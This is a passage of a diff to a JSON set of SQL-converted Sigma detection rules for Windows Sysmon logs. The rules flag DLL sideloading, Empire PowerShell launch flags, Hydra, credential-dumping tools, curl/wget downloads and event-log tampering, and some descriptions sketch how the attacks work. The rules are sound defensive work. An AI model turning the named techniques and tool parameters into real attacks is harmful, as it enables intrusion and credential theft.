LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_install_quiet.yml" + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" }, { - "title": "Potentially Over Permissive Permissions Granted Using Dsacls.EXE", - "id": "01c42d3c-242d-4655-85b2-34f1739632f7", + "title": "Potential DLL Sideloading Via JsSchHlp", + "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "status": 
"experimental", - "description": "Detects usage of Dsacls to grant over permissive permissions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrators granting over permissive permissions to users" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND CommandLine LIKE '% /G %' ESCAPE '\\' AND (CommandLine LIKE '%GR%' ESCAPE '\\' OR CommandLine LIKE '%GE%' ESCAPE '\\' OR CommandLine LIKE '%GW%' ESCAPE '\\' OR CommandLine LIKE '%GA%' ESCAPE '\\' OR CommandLine LIKE '%WP%' ESCAPE '\\' OR CommandLine LIKE '%WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsacls_abuse_permissions.yml" + "filename": "image_load_side_load_jsschhlp.yml" }, { - "title": "Permission Check Via Accesschk.EXE", - "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "title": "Svchost DLL Search Order Hijack", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", "status": "test", - "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading 
of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "author": "SBousseaden", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml" + "filename": "image_load_side_load_svchost_dlls.yml" }, { - "title": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "id": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", + "id": 
"48bfd177-7cf2-412b-ad77-baf923489e82", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "falsepositives": [ - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" - }, - { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.defense_evasion", + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * 
FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_dll_vsstrace_susp_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", + "title": "HackTool - SharpEvtMute DLL Load", + "id": "49329257-089d-46e6-af37-4afce4290685", + "status": "experimental", + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Other DLLs with the same Imphash" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass 
-EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_hktl_sharpevtmute.yml" }, { - "title": "Perl Inline Command Execution", - "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "title": "UIPromptForCredentials DLLs", + "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", "status": "experimental", - "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.collection", + "attack.t1056.002" ], "falsepositives": [ - "Unknown" + "Other legitimate processes loading those DLLs in your environment." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_perl_inline_command_execution.yml" + "filename": "image_load_uipromptforcreds_dlls.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": 
"Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Potential Rcdll.DLL Sideloading", + "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", + "status": "experimental", + "description": "Detects potential DLL sideloading of rcdll.dll", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_side_load_rcdll.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "title": "Web Browsers DLL Sideloading", + "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and 
research)", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "filename": "image_load_side_load_web_browsers.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Sideloading Of DBGHELP.DLL", + "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": 
"Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Possible but rare" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" ], - "filename": 
"proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_side_load_dbghelp_dll.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "title": "Active Directory Kerberos DLL Loaded Via Office Application", + "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Kerberos DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_office_kerberos_dll_load.yml" }, { - "title": "Gpscript Execution", - "id": 
"1e59c230-6670-45bf-83b0-98903780607e", + "title": "DLL Sideloading Of ShellChromeAPI.DLL", + "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "status": "experimental", - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "author": "frack113", + "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate uses of logon scripts distributed via group policy" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_gpscript.yml" + "filename": "image_load_side_load_shell_chrome_api.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "PowerShell Core DLL Loaded By Non PowerShell Process", + "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "status": 
"experimental", + "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "tags": [ + "attack.t1059.001", + "attack.execution" + ], "falsepositives": [ - "Administrative activity" + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_dll_system_management_automation_susp_load.yml" }, { - "title": "Suspicious MsiExec Embedding Parent", - "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "title": "System Drawing DLL Load", + "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "author": "frack113", + "description": "Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1218.007", - "attack.defense_evasion" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Unknown" + "False positives are very common from system and third party applications, activity needs to be investigated. 
This rule is best correlated with other events to increase the level of suspiciousness" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_msiexec_embedding.yml" + "filename": "image_load_dll_system_drawing_load.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Potential Wazuh Security Platform DLL Sideloading", + "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Many legitimate applications leverage this DLL. 
